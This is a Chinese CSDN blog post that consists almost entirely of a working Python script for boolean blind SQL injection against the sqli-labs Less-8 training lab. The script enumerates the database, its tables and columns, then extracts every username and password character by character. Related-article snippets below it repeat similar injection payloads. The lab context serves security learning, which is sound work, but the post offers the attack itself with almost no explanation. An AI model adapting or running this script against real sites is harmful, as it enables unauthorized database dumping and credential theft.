sqli-labs_less8布尔盲注脚本

最新推荐文章于 2024-08-08 14:28:23 发布
最新推荐文章于 2024-08-08 14:28:23 发布
阅读量4.7k 收藏 2
点赞数 3
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62989306/article/details/122734004
版权 
import requests
import string

url='http://127.0.0.1/sqli/Less-8/'

i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
while True:
    payload=url+"?id=1'and length(database())=%d--+"%i
    res=requests.get(payload)
    #print(payload)
    if 'You are in...........' in res.text:
        db_name_len=i
        print ('数据库长度为:'+str(db_name_len))
        break
    if i==30:
        print('error!')
        break
    i+=1

print("[+]正在猜解数据库名字......")
db_name=''
for i in range(1,db_name_len+1):
    #print(i)
    for k in string.ascii_lowercase:
        #print(k)
        payload=url+"?id=1'and substr(database(),%d,1)='%s'--+"%(i,k)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            db_name+=k
            #print(db_name)
            break
print("数据库为: %s"%db_name)

#猜解几张表
print("[+]正在猜解表的数量......")
tab_num=0
while True:
    payload=url+"?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+"%tab_num
    res=requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有"%db_name+str(tab_num)+"张表")
        break
    else:
        tab_num+=1

print("[+]开始猜解表名......")
for i in range(1,tab_num+1):
    tab_len=0
    while True:
        payload=url+"?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+"%(i-1,tab_len)
        res=requests.get(payload)
        #print(payload)
        if 'You are in...........' in res.text:
            #print ('第%d张表长度为:'%i+str(tab_len))
            break
        if tab_len==30:
            print('error!')
            break
        tab_len+=1
    tab_name=''
    for j in range(1,tab_len+1):
        for m in string.ascii_lowercase:
            payload=url+"?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+"%(i-1,j,m)
            res=requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name+=m
                #print (tab_name)
    print("[-]第%d张表名为: %s"%(i,tab_name))
    #尝试猜解表下字段......
    dump_num=0
    while True:
        payload=url+"?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+"%(tab_name,dump_num)
        res=requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段"%(tab_name,dump_num))
            break
        dump_num+=1
    
    for a in range(1,dump_num+1):
        dump_len=0
        while True:
            payload=url+"?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+"%(tab_name,a-1,dump_len)      
            res=requests.get(payload)
            #print(payload)
            if 'You are in...........' in res.text:
                #print("第%d个字段长度为%d"%(a,dump_len))
                break
            dump_len+=1
            if dump_len==30:
                print("error!!")
                break
        dump_name=''
        for i in range(1,dump_len+1):
            for j in (string.ascii_lowercase+'_-'):
                payload=url+"?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+"%(tab_name,a-1,i,j)
                res=requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name+=j
                    #print(dump_name)
                    break
        print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
    payload=url+"?id=1'and (select count(username) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(username) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)

print("[+]开始猜解users表下的password......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
    payload=url+"?id=1'and (select count(password) from security.users)=%d--+"%usn_num
    res=requests.get(payload)
    if "You are in" in res.text:
        #print(usn_num)#13
        break
    usn_num+=1
for i in range(1,usn_num+1):
    usn_len=0
    while True:
        payload=url+"?id=1'and (select length(password) from security.users limit %d,1)=%d--+"%(i-1,usn_len)
        res=requests.get(payload)
        if "You are in" in res.text:
            #print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len+=1
    usr_name=''
    for k in range(1,usn_len+1):
        for m in char:
            payload=url+"?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name+=m
                break
    print(usr_name)

kikkeve
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sqli-labs第八关布尔盲注脚本
weixin_42750666的博客
04-01 777
import requests def get_dbNamelen(url): #猜解数据库名字长度 length=0 while True: dbNameLen_url=url+"?id=1' and length(database())="+str(length)+"--+" #print(dbNameLen_url) ...
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 568
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1758
python实现sqli-labs第15关post盲注的二分法注入脚本(基于布尔盲注
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
sqli-labs8/9关,注入脚本编写
xuyan1119的博客
09-21 107
盲注脚本、延时注入脚本
sql-lap less8 二分法sql盲注脚本
qq_73722777的博客
04-14 244
【代码】sql-lap less8 二分法脚本
SQLi第八关,Sqli-labs Less-8,sqlibals less8
2401_83641533的博客
04-13 654
ASCLL码表中包含了字符的所有可能性(字母、数字或特殊符号),ASCLL总共127个字符,其中可输入的字符只有32~126,我们穷举每一种可能性,即可猜解出完整的数据。如果id不存在,则页面空显示,比如输入?id=0(用户id不能是0或负数,id为0时,查询结果为空,会导致页面空显示)length(“abc”)>1 结果为 true,因此,参数等价于。id=1’,页面空显示,说明单引号被数据库识别,导致数据库报错。id=1’ and 1 – a,页面正常显示,查询成功。
sqli-labs布尔盲注脚本的编写
0xdawn的博客
03-12 1370
0x00 前言 此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。 第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄 无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。 以下是模块解析 0x01 模块 1.判断数据库库名长度 def db_length(): db_l...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
03-17
SQL-labs靶场包含了丰富的练习场景,涵盖了各种类型的SQL注入漏洞,例如:盲注、时间盲注、基于错误的注入、联合查询注入、堆叠查询注入等。这些练习可以帮助你理解每种注入方式的工作原理,以及如何利用它们进行...
sqlilabs第五关布尔盲注(burpsuite版)
xnxqwzy的博客
04-20 852
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)
qq_45106794的博客
10-29 795
import requests db_length=1 db_url='' db_place=1 db_name='' db_ascii=1 print("猜解数据库长度") url="http://192.168.56.101/sqli-labs-master/less-5/?id=1'" for db_length in range(1,100): db_url=url+'and %d...
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3590
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 494
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1033
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
基于python布尔盲注爆破脚本sqli-libs第八关)
henghengzhao_的博客
10-06 1848
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
大模型微调工具-torchtune
最新发布
weixin_40777649的博客
08-08 1014
1.定义2.安装3. 案例。
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kikkeve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值